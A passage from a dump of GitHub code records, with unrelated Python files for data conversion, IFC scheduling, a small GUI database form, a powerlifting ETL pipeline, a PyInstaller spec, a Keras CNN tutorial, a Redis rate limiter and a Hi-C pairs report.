The only difference being: A promise's lifecycle\n # and scheduling is handled by the Javascript engine; the Future's lifecycle and scheduling\n # is handled by this asyncio loop here.\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"unswsecsoc/buried-deep","sub_path":"api_request.py","file_name":"api_request.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"1861317720","text":"### This Script Extracts Impedance Data from an Ec_Lab ouput .mpt to and creates a corresponding csv file ###\n\n#For command line commands\nimport os\n\n#For data handling\nimport pandas as pd\n\n#For working with strings\nimport re\n\n#Get the files to be measured\nHomeFiles=os.listdir()\nImpedanceFiles = []\n\npattern = re.compile(\".mpt$\") # Compile a regex\nfor line in HomeFiles:\n if pattern.search(line) != None: # If a match is found \n ImpedanceFiles.append(line)\n\nfor line in ImpedanceFiles:\n file=open(line, 'r', encoding='cp1252')\n F = []\n R = []\n Im = []\n\n for thing in file.readlines()[60:]:\n fields = thing.split()\n if float(fields[2])>=0:\n F = F + [float(fields[0])]\n R = R + [float(fields[1])]\n Im = Im + [-float(fields[2])]\n file.close()\n \n EISdata=list(zip(F, R, Im))\n df = pd.DataFrame(data = EISdata, columns=['Frequency', 'R(ohmcm^2)','Im(ohmcm^2)'])\n namesplit = line.split(\".\")\n outfilename = namesplit[0] + \".csv\" \n df.to_csv(outfilename,index=False,header=True)\n","repo_name":"hailegroup/ECIF","sub_path":"main/Batch/EC_File_Converter.py","file_name":"EC_File_Converter.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"23926053573","text":"import ifcopenshell.util.date\n\n\nclass Usecase:\n def __init__(self, file, work_schedule=None, attributes=None):\n \"\"\"Edits the attributes of an IfcWorkSchedule\n\n For more information about the attributes and data types of an\n IfcWorkSchedule, consult the IFC documentation.\n\n :param work_schedule: The IfcWorkSchedule entity you want to edit\n :type work_schedule: ifcopenshell.entity_instance.entity_instance\n :param attributes: a dictionary of attribute names and values.\n :type attributes: dict, optional\n :return: None\n :rtype: None\n\n Example:\n\n .. 
code:: python\n\n # This will hold all our construction schedules\n work_plan = ifcopenshell.api.run(\"sequence.add_work_plan\", model, name=\"Construction\")\n\n # Let's imagine this is one of our schedules in our work plan.\n schedule = ifcopenshell.api.run(\"sequence.add_work_schedule\", model,\n name=\"Construction Schedule A\", work_plan=work_plan)\n\n # Let's give it a description\n ifcopenshell.api.run(\"sequence.edit_work_schedule\", model,\n work_schedule=work_schedule, attributes={\"Description\": \"3 crane design option\"})\n \"\"\"\n self.file = file\n self.settings = {\"work_schedule\": work_schedule, \"attributes\": attributes or {}}\n\n def execute(self):\n for name, value in self.settings[\"attributes\"].items():\n if value:\n if \"Date\" in name or \"Time\" in name:\n value = ifcopenshell.util.date.datetime2ifc(value, \"IfcDateTime\")\n elif name == \"Duration\" or name == \"TotalFloat\":\n value = ifcopenshell.util.date.datetime2ifc(value, \"IfcDuration\")\n setattr(self.settings[\"work_schedule\"], name, value)\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/ifcopenshell-python/ifcopenshell/api/sequence/edit_work_schedule.py","file_name":"edit_work_schedule.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"} +{"seq_id":"15411396566","text":"import PySimpleGUI as sg\r\nimport sqlite3\r\nsg.theme(\"LightGrey3\")\r\n\r\nconn = sqlite3.connect(\"randi.db\")\r\nc = conn.cursor()\r\nc.execute(\"CREATE TABLE IF NOT EXISTS tb(nev TEXT, telefonszam TEXT, eletkor INTEGER)\")\r\nconn.commit()\r\n\r\ncol1=[\r\n\r\n [sg.Text('Név:' )],\r\n [sg.Text('Telefonszám:' )],\r\n [sg.Text('Életkor:' )],\r\n [sg.Button('Keres')]\r\n ]\r\n\r\ncol2=[\r\n\r\n [sg.Input(key='Név')],\r\n [sg.Input(key='Telefonszám')],\r\n [sg.Input(key='Életkor')],\r\n [sg.Button('Ment')]\r\n ]\r\n\r\nlayout= [\r\n [sg.Column(col1),sg.Column(col2)]\r\n ]\r\n\r\n\r\nwindow = sg.Window(\"Randi\",layout)\r\n\r\nwhile True:\r\n event, values = window.read()\r\n print(event, values)\r\n if event in (None, \"Exit\"):\r\n break\r\n \r\n if event in (\"Ment\"):\r\n nev = values['Név']\r\n telefonszam = values['Telefonszám']\r\n eletkor = values['Életkor']\r\n c.execute(\"INSERT INTO tb VALUES(?,?,?)\",(nev,telefonszam,eletkor))\r\n conn.commit()\r\n \r\n if event in (\"Keres\"):\r\n nev = values['Név']\r\n telefonszam = values['Telefonszám']\r\n eletkor = values['Életkor']\r\n c.execute(\"SELECT * FROM tb WHERE nev LIKE ?\",(nev,))\r\n eredmeny=c.fetchall()\r\n nev=eredmeny[0][0]\r\n telefonszam=eredmeny[0][1]\r\n eletkor=eredmeny[0][2]\r\n window['Név'].update(nev)\r\n window['Telefonszám'].update(telefonszam)\r\n window['Életkor'].update(eletkor)\r\n \r\n print(eredmeny)","repo_name":"tamasjuhasz84/randi","sub_path":"randi.py","file_name":"randi.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36970963684","text":"import glob\nimport csv\nimport pandas as pd\nimport psycopg2\nfrom sqlalchemy import create_engine\n\n\ndef combine_columns(row):\n return f\"{row['country']}.{row['state']}.{row['town']}\"\n\n\ndef insert_frame(df, table_name):\n db = create_engine(\"postgresql://student:student@127.0.0.1/studentdb\")\n conn = db.connect()\n\n # Insert into Database\n df.to_sql(con=conn, name=table_name, index=False, if_exists=\"append\")\n\n conn.close()\n\n\ndef load_table(table_name):\n db = 
create_engine(\"postgresql://student:student@127.0.0.1/studentdb\")\n conn = db.connect()\n\n sql_query = f\"SELECT * FROM {table_name}\"\n\n df = pd.read_sql(sql_query, conn)\n\n return df\n\n\ndef lookup_contest_id(row, lookup):\n key = f\"{row['name']}.{row['date']}\"\n return lookup[key]\n\n\ndef handle_contest_results(df, athletes, contests):\n # Rename ids to support foreign keys\n athletes = athletes.rename(columns={\"id\": \"athlete_id\"})\n contests = contests.rename(columns={\"id\": \"contest_id\"})\n\n \"\"\"\n I spent hours trying to merge the df data frame with the contests data frame but I\n kept getting contest_id = NaN for all records. I decided to, instead, go with the \n less elegant but still pretty quick python dictionary to act as a hash map, which\n still has pretty decent speed. Compute power is cheap, developer time is not.\n\n df = df.rename(columns={\"MeetName\": \"name\", \"Date\": \"date\"})\n # Merge Contests\n df = df.merge(contests, on=[\"name\", \"date\"], how=\"left\")\n \n \"\"\"\n contest_id_lookup = {}\n for index, row in contests.iterrows():\n contest_id_lookup[f\"{row['name']}.{row['date']}\"] = row[\"contest_id\"]\n\n df = df.rename(columns={\"MeetName\": \"name\", \"Date\": \"date\"})\n df[\"contest_id\"] = df.apply(lookup_contest_id, axis=1, lookup=contest_id_lookup)\n df = df.drop([\"name\", \"date\"], axis=1)\n\n # Rename for athletes\n df = df.rename(columns={\"Name\": \"name\"})\n df[[\"name\", \"deduplication_number\"]] = df.name.str.split(\" #\", expand=True)\n df.deduplication_number.fillna(value=0, inplace=True)\n\n # Merge Athletes\n df = df.merge(athletes, on=[\"name\", \"deduplication_number\"], how=\"left\")\n\n # Drop Merge Fields\n df = df.drop([\"name\", \"deduplication_number\", \"gender\"], axis=1)\n\n # Rename contest fields\n df = df.rename(\n columns={\n \"Event\": \"event\",\n \"Equipment\": \"equipment\",\n \"Division\": \"division\",\n \"Age\": \"age\",\n \"AgeClass\": \"age_class\",\n \"BirthYearClass\": \"birth_year_class\",\n \"BodyweightKg\": \"bodyweight\",\n \"WeightClassKg\": \"weight_class\",\n \"Best3SquatKg\": \"squat\",\n \"Best3BenchKg\": \"bench_press\",\n \"Best3DeadliftKg\": \"deadlift\",\n \"Place\": \"place\",\n \"TotalKg\": \"meet_total\",\n \"Dots\": \"dots\",\n \"Tested\": \"drug_tested\",\n }\n )\n\n # Normalize Event\n df[\"event\"].replace(\"SBD\", \"FP\", inplace=True)\n df[\"event\"].replace(\"BD\", \"BD\", inplace=True)\n df[\"event\"].replace(\"SD\", \"SD\", inplace=True)\n df[\"event\"].replace(\"SB\", \"SB\", inplace=True)\n df[\"event\"].replace(\"S\", \"SQ\", inplace=True)\n df[\"event\"].replace(\"B\", \"BP\", inplace=True)\n df[\"event\"].replace(\"D\", \"DL\", inplace=True)\n\n # Normalize Equipment\n df[\"equipment\"].replace(\"Raw\", \"R\", inplace=True)\n df[\"equipment\"].replace(\"Wraps\", \"W\", inplace=True)\n df[\"equipment\"].replace(\"Single-ply\", \"S\", inplace=True)\n df[\"equipment\"].replace(\"Multi-ply\", \"M\", inplace=True)\n df[\"equipment\"].replace(\"Unlimited\", \"U\", inplace=True)\n df[\"equipment\"].replace(\"Straps\", \"T\", inplace=True)\n\n print(\"Pre:\")\n print(df)\n\n # Remove any results without a numeric 'place' - they were either disqualified,\n # no shows, guest lifters, etc.\n df[\"place\"] = pd.to_numeric(df[\"place\"], errors=\"coerce\")\n df = df.dropna(subset=[\"place\"])\n\n # Weight class field includes + symbol representing anything over the weight.\n df[\"weight_class\"] = pd.to_numeric(df[\"weight_class\"], errors=\"coerce\")\n\n 
df[\"drug_tested\"].replace(\"Yes\", \"True\", inplace=True)\n df[\"drug_tested\"].replace(\"No\", \"False\", inplace=True)\n df[\"drug_tested\"].fillna(value=\"False\", inplace=True)\n\n print(\"Post:\")\n print(df)\n\n # Update database\n insert_frame(df, \"powerlifting_contestresult\")\n\n\ndef handle_contests(df, locations_df):\n # Rename Fields\n df = df.rename(\n columns={\n \"MeetCountry\": \"country\",\n \"MeetState\": \"state\",\n \"MeetTown\": \"town\",\n \"MeetName\": \"name\",\n \"Federation\": \"federation\",\n \"ParentFederation\": \"parent_federation\",\n \"Date\": \"date\",\n }\n )\n\n # Deduplicate\n df = df.drop_duplicates([\"name\", \"date\"])\n\n # Fill in Missing Towns and States with Blank Values\n df.town.fillna(value=\"\", inplace=True)\n df.state.fillna(value=\"\", inplace=True)\n\n # Rename locations\n locations_df = locations_df.rename(columns={\"id\": \"location_id\"})\n\n df = df.merge(locations_df, on=[\"country\", \"town\", \"state\"], how=\"left\")\n\n # Remove unnecessary fields post merge\n df = df.drop([\"country\", \"state\", \"town\"], axis=1)\n\n # Fill in missing values\n df.federation.fillna(value=\"\", inplace=True)\n df.parent_federation.fillna(value=\"\", inplace=True)\n\n # Insert into database\n insert_frame(df, \"powerlifting_contest\")\n\n\ndef handle_athletes(df):\n \"\"\"Transform dataframe containing athlete information and insert into database\"\"\"\n # 'Name' column is deduplicated via # symbol, so, we can drop based on name\n athletes = df.drop_duplicates(\"Name\")\n\n # Rename Name to name and Sex to gender to conform with database fields\n athletes = athletes.rename(columns={\"Name\": \"name\", \"Sex\": \"gender\"})\n\n # Split \"name\" column into \"name\" and \"deduplication_number\"\n try:\n athletes[[\"name\", \"deduplication_number\"]] = athletes.name.str.split(\n \" #\", expand=True\n )\n except:\n athletes[\"deduplication_number\"] = 0\n\n # Transform 'gender' field, replacing \"Mx\" with \"X\", to conform with API Schema\n athletes[\"gender\"].replace(\"Mx\", \"X\", inplace=True)\n\n # If there are 'deduplication_number' fields with no value, replace with 0\n athletes.deduplication_number.fillna(value=0, inplace=True)\n\n insert_frame(athletes, \"powerlifting_athlete\")\n return athletes\n\n\ndef handle_locations(df):\n # Rename fields\n df = df.rename(\n columns={\"MeetCountry\": \"country\", \"MeetState\": \"state\", \"MeetTown\": \"town\"}\n )\n\n # Fill in Missing Towns and States with Blank Values\n df.town.fillna(value=\"\", inplace=True)\n df.state.fillna(value=\"\", inplace=True)\n\n # Create a deduplicating column\n df[\"dedup\"] = df.apply(combine_columns, axis=1)\n\n # Deduplicate Columns\n df = df.drop_duplicates(\"dedup\")\n\n # Drop deduplicating column\n df = df.drop(\"dedup\", axis=1)\n\n # Insert locations into database\n insert_frame(df, \"powerlifting_contestlocation\")\n\n\ndef start():\n dir = \"opl\"\n csv_files = glob.glob(f\"{dir}/**/*.csv\")\n\n # print(csv_files)\n\n athletes_frames = []\n location_frames = []\n contest_frames = []\n contest_result_frames = []\n for csv_fp in csv_files:\n for df in pd.read_csv(csv_fp, chunksize=5000):\n # Create an athletes data frame\n athletes_frames.append(df.loc[:, [\"Name\", \"Sex\"]])\n\n # Create a locations data frame\n location_frames.append(df.loc[:, [\"MeetCountry\", \"MeetState\", \"MeetTown\"]])\n\n # Create a contests data frame\n contest_frames.append(\n df.loc[\n :,\n [\n \"MeetName\",\n \"Federation\",\n \"ParentFederation\",\n \"Date\",\n 
\"MeetCountry\",\n \"MeetState\",\n \"MeetTown\",\n ],\n ]\n )\n\n # Contest Results\n contest_result_frames.append(\n df.loc[\n :,\n [\n \"MeetName\",\n \"Date\",\n \"Name\",\n \"Event\",\n \"Equipment\",\n \"Tested\",\n \"Division\",\n \"Age\",\n \"AgeClass\",\n \"BirthYearClass\",\n \"BodyweightKg\",\n \"WeightClassKg\",\n \"Best3DeadliftKg\",\n \"Best3SquatKg\",\n \"Best3BenchKg\",\n \"Place\",\n \"TotalKg\",\n \"Dots\",\n ],\n ]\n )\n\n # Insert Athletes\n # handle_athletes(pd.concat(athletes_frames))\n athletes = load_table(\"powerlifting_athlete\")\n\n # Insert Locations\n # handle_locations(pd.concat(location_frames))\n locations = load_table(\"powerlifting_contestlocation\")\n\n # Insert Contests\n # handle_contests(pd.concat(contest_frames), locations)\n contests = load_table(\"powerlifting_contest\")\n\n # Insert Contest Results\n handle_contest_results(pd.concat(contest_result_frames), athletes, contests)\n\n\ndef test():\n df1 = [\n [\"name\", \"date\"],\n [\"Open Tournament\", \"2019-05-11\"],\n [\"World Open Championships\", \"2016-11-14\"],\n ]\n\n\nif __name__ == \"__main__\":\n start()\n # test()\n","repo_name":"rickstc/udacity-data-engineering","sub_path":"capstone/etl/import_pl.py","file_name":"import_pl.py","file_ext":"py","file_size_in_byte":9552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"4066996853","text":"# -*- mode: python -*-\n# TODO: ALERT! Before building, you MUST manually set the PYTHONPATH env-var as follows!\n# WIN Preparation: set PYTHONPATH=\"C:\\Users\\rp\\.virtualenvs\\xi-cam2\\Lib\\site-packages\"\n# WIN Usage: pyinstaller --clean --onefile --noconsole --paths C:\\Windows\\System32\\downlevel Xi-cam.spec\n# OSX Usage: pyinstaller --clean --onefile --noconsole --osx-bundle-identifier gov.lbl.camera.xicam Xi-cam.spec\n\nimport glob, os\nimport distributed\nimport astropy\nimport qtpy # preload qtpy and QApplication so that manager thinks qt is safe\nfrom qtpy import QtWidgets\n\nqapp = QtWidgets.QApplication([])\nfrom xicam.plugins import manager as pluginmanager\nimport xicam.plugins, xicam.core, xicam.gui\nimport qtmodern\nimport pip\nimport PyQt5\nimport dask\nimport site\n\nblock_cipher = None\n\nfrom xicam.gui import static\n\n# Some packages have messy non-py contents; Lets wrangle them!\ndatas_src = [\n path for path in glob.glob(os.path.join(static.__path__[0], \"**/*.*\"), recursive=True) if \"__init__.py\" not in path\n]\ndatas_dst = [os.path.dirname(os.path.relpath(path, static.__path__[0])) for path in datas_src]\n\n# Astropy is a mess of file-based imports; must include source outside of pkg\ndatas_src.append(astropy.__path__[0])\ndatas_dst.append(\"astropy\")\n\n# qtmodern has lots of data files; including source\ndatas_src.append(qtmodern.__path__[0])\ndatas_dst.append(\"qtmodern\")\n\n# pip needs its certs\ndatas_src.append(pip.__path__[0])\ndatas_dst.append(\"pip\")\n\n# PyQt5 needs its binaries\ndatas_src.append(PyQt5.__path__[0])\ndatas_dst.append(\"PyQt5\")\n\n# Dask needs its config yaml\ndatas_src.append(dask.__path__[0])\ndatas_dst.append('dask')\n\n# Distributed needs its yaml\ndatas_src.append(os.path.join(distributed.__path__[0],'distributed.yaml'))\ndatas_dst.append('distributed')\n\npluginmanager.collectPlugins(paths=[xicam.core.__path__[0], xicam.plugins.__path__[0], xicam.gui.__path__[0]])\nplugins = pluginmanager.getAllPlugins()\ndatas_src.extend([plugin.path for plugin in plugins])\ndatas_dst.extend([\"plugins\"] * len(plugins))\n\na = 
Analysis(['run_xicam.py'],\n pathex=[os.getcwd(),\n 'C:\\\\Windows\\\\System32\\\\downlevel',\n site.getsitepackages()],\n binaries=[],\n datas=zip(datas_src, datas_dst),\n hiddenimports=['pandas._libs.tslibs.timedeltas',\n 'imagecodecs._imagecodecs_lite',\n 'pandas._libs.tslibs.np_datetime',\n 'pandas._libs.tslibs.nattype',\n 'pandas._libs.tslibs',\n 'pandas._libs.skiplist',\n 'numpy.lib',\n 'numpy.lib.recfunctions',\n 'shelve',\n 'requests',\n 'qdarkstyle',\n 'xicam.core.execution',\n 'xicam.plugins.cammart',\n 'xicam.gui.widgets.dynimageview',\n 'compileall',\n 'xicam.gui.windows',\n 'xicam.core',\n 'xicam.plugins',\n 'xicam.gui'\n ],\n hookspath=[],\n runtime_hooks=[],\n excludes=['astropy', 'qtmodern', 'pip', 'PyQt5'], # included in data\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher)\n\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\n\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='Xi-cam',\n debug=False,\n strip=False,\n upx=True,\n console=True )\n\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n name='Xi-cam')\n","repo_name":"Xi-CAM/Xi-cam","sub_path":"Xi-cam.spec","file_name":"Xi-cam.spec","file_ext":"spec","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"71"} +{"seq_id":"70493342951","text":"\"\"\" non-binary classifier + cnn + imageDataGen \"\"\"\n\nimport silence_tensorflow.auto\nfrom tensorflow import keras\nfrom tuto_utils.util_func import plot_acc_loss\nimport os\n\nbatch_size = 126\nepochs = 20\nstep_train = int(2520/batch_size)\nstep_valid = int(327/batch_size)\n\n\n# ImageDataGenerator classes are in alphabetical order\n\ntrain_datagen = keras.preprocessing.image.ImageDataGenerator(rescale=1./255, rotation_range=40, width_shift_range=.2,\n height_shift_range=.2, shear_range=.2, zoom_range=.2,\n horizontal_flip=True, fill_mode='nearest')\nvalid_datagen = keras.preprocessing.image.ImageDataGenerator(rescale=1./255)\n\ntrain_generator = train_datagen.flow_from_directory('../../DataSets/rps/rps_train', target_size=(150, 150),\n batch_size=batch_size, class_mode='categorical')\nvalid_generator = valid_datagen.flow_from_directory('../../DataSets/rps/rps_test', target_size=(150, 150),\n batch_size=batch_size, class_mode='categorical')\n\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Conv2D(16, 3, activation='relu', input_shape=(150, 150, 3)))\nmodel.add(keras.layers.MaxPooling2D(2, 2))\nmodel.add(keras.layers.Conv2D(32, 3, activation='relu'))\nmodel.add(keras.layers.MaxPooling2D(2, 2))\nmodel.add(keras.layers.Conv2D(64, 3, activation='relu'))\nmodel.add(keras.layers.MaxPooling2D(2, 2))\nmodel.add(keras.layers.Flatten())\nmodel.add(keras.layers.Dropout(.5))\nmodel.add(keras.layers.Dense(512, activation='relu'))\nmodel.add(keras.layers.Dense(3, activation='softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=keras.optimizers.RMSprop(lr=.001), metrics=['acc'])\nhistory = model.fit(train_generator, steps_per_epoch=step_train, epochs=epochs,\n validation_data=valid_generator, validation_steps=step_valid)\n\nplot_acc_loss(history)\n\n\n\"\"\"\n20 epochs, no data augment, plateau 80% valid acc\n20 epochs, data augment, 99% valid acc\n\"\"\"\n\n\ndef try_image(path):\n import numpy as np\n img = keras.preprocessing.image.load_img(path, target_size=(150, 150))\n x = keras.preprocessing.image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n images = np.vstack([x])\n classes = 
model.predict(images, batch_size=10)\n print(path)\n print(classes)\n\n\ntry_image('../../DataSets/rps/test_pic/rock3.png')","repo_name":"Lem0nRavioli/tutorial_backup","sub_path":"Coursea/CnnTF/tuto4.py","file_name":"tuto4.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27674388243","text":"import functools\n\nfrom aioredis import Redis\nfrom fastapi import HTTPException\n\nclient = Redis(host=\"redis\")\n\n\nasync def limit(key: str, limit: int = 5, ttl: int = 60) -> dict:\n \"\"\"Basic rate limiter for endpoints.\n Used to limit the amount of calls to endpoints.\n :param key: the key to use to store the calls\n :param limit: the maximum amount of calls allowed during ttl\n :param ttl: the time to live of the calls\n :return: a dictionary with the following keys: call, ttl\n \"\"\"\n req = await client.incr(key)\n if req == 1:\n await client.expire(key, 60)\n ttl = 60\n else:\n ttl = await client.ttl(key)\n if req > limit:\n return {\"call\": False, \"ttl\": ttl}\n else:\n return {\"call\": True, \"ttl\": ttl}\n\n\ndef limiter(*, max_calls: int = 5, ttl: int = 60):\n \"\"\"\n NOTE: This decorator requires the decorated function to have\n fastAPI Request in the parameters.\n sample usage:\n >>> from fastapi import FastAPI, Request\n >>> app = FastAPI()\n >>>\n >>> @app.get(\"/hello/\") # app is a fastAPI object\n >>> @limiter(max_calls=5, ttl=60) # Max amount of calls is 5 per minute\n >>> async def my_endpoint(request: Request): # request is a fastAPI Request object\n >>> return {\"message\": \"Hello World!\"}\n\n In the example above the order of decorators is important.\n\n Decorator to limit the amount of calls to a specific endpoint.\n Limitation is based on IP address.\n :param max_calls: the maximum amount of calls allowed during ttl\n :param ttl: the time to live of the calls in seconds\n :return: HTTPException OR the function\n \"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n async def wrapper(*args, **kwargs):\n client_ip = kwargs[\"request\"].client.host\n res = await limit(client_ip, max_calls, ttl)\n if res[\"call\"]:\n return await func(*args, **kwargs)\n else:\n raise HTTPException(\n status_code=429,\n detail=f\"\"\"Ratelimited, too many requests. 
Try again in\n {res['ttl']} seconds.\"\"\",\n headers={\"Retry-After\": res[\"ttl\"]},\n )\n\n return wrapper\n\n return decorator\n","repo_name":"Nipa-Code/lemon-API","sub_path":"lemonapi/utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"5997962243","text":"#!/usr/bin/env python\n\"\"\"Create pairs report.\"\"\"\n\nfrom collections import defaultdict\nfrom typing import List, Tuple\n\nimport pandas as pd\nimport panel as pn\nimport typer\nimport hvplot.pandas # noqa\n\npn.extension()\n\nPAIR_TYPES = {\n \"W\": \"walk\",\n \"N\": \"null\",\n \"X\": \"corrupt\",\n \"M\": \"multi\",\n \"R\": \"rescued\",\n \"U\": \"unique\",\n \"D\": \"duplicate\",\n}\n# https://github.com/4dn-dcic/pairsqc/blob/master/pairsqc.py\nORI_NAMES = dict(zip([\"+-\", \"-+\", \"++\", \"--\"], [\"Inner\", \"Outer\", \"Right\", \"Left\"]))\n\n\n# %%\ndef _parse_totals_table(data=List[Tuple[str, str]]):\n \"\"\"Parse totals table.\"\"\"\n res = []\n total = 0\n for key, val in data:\n key = key.strip()\n if key == \"total\":\n section = \"all\"\n total = int(val)\n elif key in (\"total_unmapped\", \"total_single_sided_mapped\", \"total_mapped\"):\n section = \"mapping\"\n elif key in (\"total_dups\", \"total_nodups\"):\n section = \"duplicates\"\n elif key in (\"cis\", \"trans\"):\n section = \"cis/trans\"\n elif key.startswith(\"cis_\"):\n section = \"distance\"\n else:\n raise ValueError(f\"#{key}#\")\n\n res.append((section, key, int(val)))\n df = pd.DataFrame(res, columns=[\"Section\", \"Type\", \"Count\"])\n df[\"Perc. of Total\"] = df[\"Count\"] / total * 100.0\n df[\"Perc. of Section\"] = df.groupby(\"Section\")[\"Count\"].transform(\n lambda x: 100.0 * x / x.sum()\n )\n return df\n\n\ndef _parse_pair_types(data=List[Tuple[str, str]]):\n \"\"\"Parse pair types.\"\"\"\n res = []\n for code, val in data:\n left, right = code[0], code[1]\n label = f\"{PAIR_TYPES[left]}-{PAIR_TYPES[right]}\"\n res.append((code, left, right, label, int(val)))\n df = pd.DataFrame(res, columns=[\"code\", \"left\", \"right\", \"label\", \"pairs\"])\n df[\"perc\"] = 100.0 * df[\"pairs\"] / df[\"pairs\"].sum()\n return df\n\n\ndef _parse_chrom_freq(data=List[Tuple[str, str]]):\n \"\"\"Parse chrom freq.\"\"\"\n res = []\n for code, val in data:\n chr1, chr2 = code.split(\"/\")\n res.append((chr1, chr2, int(val)))\n\n df = (\n pd.DataFrame(res, columns=[\"chrom1\", \"chrom2\", \"count\"])\n .set_index([\"chrom1\", \"chrom2\"])\n .sort_index()\n .unstack(fill_value=0)\n )\n df = df.xs(\"count\", axis=1)\n return df\n\n\ndef _parse_summary(data=List[Tuple[str, str]]):\n \"\"\"Parse summary.\"\"\"\n res = []\n for key, val in data:\n res.append({\"statistic\": key, \"value\": float(val)})\n return pd.DataFrame(res)\n\n\ndef _parse_dist_freq(data=List[Tuple[str, str]]):\n \"\"\"Parse dist freq.\"\"\"\n res = []\n for key, val in data:\n interval, ori = key.split(\"/\")\n interval = interval.strip()\n if interval.endswith(\"+\"):\n bin_left = bin_right = interval[:-1]\n else:\n bin_left, bin_right = interval.split(\"-\")\n res.append(\n (int(bin_left), int(bin_right), ori, ORI_NAMES[ori] + f\" ({ori})\", int(val))\n )\n res = pd.DataFrame(\n res, columns=[\"bin_left\", \"bin_right\", \"ori\", \"ori_name\", \"count\"]\n )\n return res\n\n\ndef read_pairs_stats(path):\n \"\"\"Read Pairs stats.\"\"\"\n _data = defaultdict(list)\n with open(path) as f:\n for i in f:\n if \"/\" not in i:\n table = 
\"totals\"\n else:\n table, i = i.split(\"/\", 1)\n _data[table].append(tuple(i.strip().split(\"\\t\")))\n totals = _parse_totals_table(_data[\"totals\"])\n pair_types = _parse_pair_types(_data[\"pair_types\"])\n chrom_freq = _parse_chrom_freq(_data[\"chrom_freq\"])\n summary = _parse_summary(_data[\"summary\"])\n dist_freq = _parse_dist_freq(_data[\"dist_freq\"])\n return totals, pair_types, chrom_freq, summary, dist_freq\n\n\ndef main(pair_stats, report_html, show_chroms=None):\n \"\"\"Entry point.\"\"\"\n totals, pair_types, chrom_freq, summary, dist_freq = read_pairs_stats(\n pair_stats)\n totals_pane = pn.Column(\n pn.Row(\n pn.pane.DataFrame(totals.set_index(\n [\"Section\", \"Type\"]), width=600),\n totals.query(\"Section == 'mapping'\").hvplot.bar(\n x=\"Section\",\n y=\"Perc. of Total\",\n by=\"Type\",\n hover_cols=[\"Count\", \"Perc. of Total\"],\n stacked=True,\n width=400,\n title=\"Mapping Rate\",\n ),\n ),\n totals.query(\"Section == 'distance'\").hvplot.bar(\n x=\"Type\", y=\"Perc. of Section\",\n title=\"Genomic Distance Distribution\"\n ),\n )\n\n pair_type_pane = pn.Column(\n pair_types.hvplot.bar(\n x=\"label\", y=\"perc\", hover_cols=[\"pairs\"], title=\"Pair Types\"\n ),\n pn.pane.DataFrame(pair_types, width=600),\n )\n show_chroms_columns = chrom_freq.columns\n show_chroms_index = chrom_freq.index\n if show_chroms is not None:\n show_chroms_columns = show_chroms_columns.intersection(show_chroms)\n show_chroms_index = show_chroms_index.intersection(show_chroms)\n chrom_freq = chrom_freq.reindex(\n index=show_chroms_index, columns=show_chroms_columns, fill_value=0\n )\n chrom_contact_pane = pn.Row(\n chrom_freq.hvplot.heatmap(\n width=600,\n height=600,\n colorbar=False,\n rot=45,\n colormap=\"viridis\",\n title=\"Contact Count\",\n ),\n chrom_freq\n .pipe(lambda x: x.div(x.sum(axis=0), axis=1))\n .hvplot.heatmap(\n width=600,\n height=600,\n colorbar=False,\n rot=45,\n colormap=\"viridis\",\n title=\"Contact Proportion (normalized by Chromosome)\",\n ),\n )\n\n distance_pane = pn.Row(\n dist_freq.hvplot.line(\n x=\"bin_right\", by=\"ori_name\", y=\"count\", logx=True)\n )\n\n report = pn.Tabs(\n (\"Pairs\", totals_pane),\n (\"Pair Types\", pair_type_pane),\n (\"Chrom Contacts\", chrom_contact_pane),\n (\"Distance\", distance_pane),\n )\n report.save(report_html)\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","repo_name":"epi2me-labs/wf-pore-c","sub_path":"bin/create_pairs_report.py","file_name":"create_pairs_report.py","file_ext":"py","file_size_in_byte":6089,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"71"} +{"seq_id":"28234150437","text":"import copy\nimport os.path\nimport sys\n\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\nfrom torchvision.datasets import VisionDataset\nfrom torch.utils.data.dataloader import DataLoader\nfrom typing import NoReturn, List\nimport json\nimport imagesize\nfrom tqdm import tqdm\nfrom prefetch_generator import BackgroundGenerator\n\nclass PrefetchLoader(DataLoader):\n def __iter__(self):\n return BackgroundGenerator(super().__iter__())\n\nclass Reader():\n \"\"\"\n to read the data\n\n feed_dict for dataloader:\n use dict to load (convenient for later use)\n should contain:\n im_data,im_info,gt_boxes,num_box\n gt_boxes: ground true roi and bbox (0-3bbox, 4target)\n im_info: w,h,scale\n \"\"\"\n\n def __init__(self, args):\n self.dataset = args.dataset_name\n self.dataset_path = args.dataset_path\n self.w = 256\n self.h = 256\n\n 
